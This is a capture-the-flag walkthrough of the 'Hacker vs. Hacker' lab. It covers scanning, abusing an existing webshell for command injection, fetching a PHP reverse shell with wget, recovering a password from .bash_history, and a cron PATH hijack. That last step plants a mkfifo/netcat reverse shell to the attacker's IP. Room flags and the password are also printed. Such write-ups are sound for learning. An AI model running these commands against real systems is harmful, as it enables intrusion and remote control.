Skip to content

Latest commit

 

History

History
174 lines (106 loc) · 4.97 KB

hackervshacker.md

File metadata and controls

174 lines (106 loc) · 4.97 KB

Hacker vs. Hacker

Someone has compromised this server already! Can you get in and evade their countermeasures?

Scanning

scan the target

nmap -sS -sV -Pn 10.10.138.41

image

HTTP

view the webpage

image

it's a recuit page and has a form to submit cv

hmm, there are some notes left about security risk

image

Enumeration

scan directories with gobuster

gobuster dir -u http://10.10.138.41/ -w /usr/share/wordlists/dirb/common.txt -t 30

image

the /cvs folder seem interesting

image

Okay so let’s try to find the hackers shell in folder. Maybe we find a webshell.

image

i found a hint left in source code

image

Exploitation

So the shell name has to contain .pdf and is likely to end with .php, i guess it

you can use gobuster to scan for the same result

image

Looks like we found it. Now we just have to find the parameter for command injection

Usually this is something like ?cmd= or ?shell= or ?command=

image

http://10.10.138.41/cvs/shell.pdf.php?cmd=cat%20/etc/passwd

image

we see a user lachlan

http://10.10.138.41/cvs/shell.pdf.php?cmd=ls%20/home/lachlan

image

http://10.10.138.41/cvs/shell.pdf.php?cmd=cat%20/home/lachlan/user.txt

image

Flag user.txt
Answer thm{af7e46b68081d4025c5ce10851430617}

Privilege Escalation

prepare you revershell

cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
vi reverse.php
python3 -m http.server

http://10.10.138.41/cvs/shell.pdf.php?cmd=wget%20http://10.8.0.74:8000/reverse.php

open your netcat and go to reverse.php

nc -vlnp 4444
http://10.10.138.41/cvs/reverse.php

image

at the same location, we see a interesting folder /bin but nothing there

image

maybe i'm in dead-end, but i think about .bash_history

cat /home/lachlan/.bash_history

image

it's password of user lachlan

ssh lachlan@10.10.211.153
thisistheway123

but it kick out us with nope message

image

check another file we found at bash history

cat /etc/cron.d/persistence

image

after researching, i found a flag at ssh command maybe useful

image

ssh lachlan@10.10.211.153 -T

image

If we look at the persistence again, you will notice that the cronjob looks inside the /home/lachlan/bin

we can create our pkill within the /home/lachlan/bin directory to gain precedence over the default pkill command

image

echo "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.0.74 4444 >/tmp/f" > /home/lachlan/bin/pkill
chmod +x pkill

open netcat listener

nc -vlnp 4444

image

image

Flag root.txt
Answer thm{7b708e5224f666d3562647816ee2a1d4}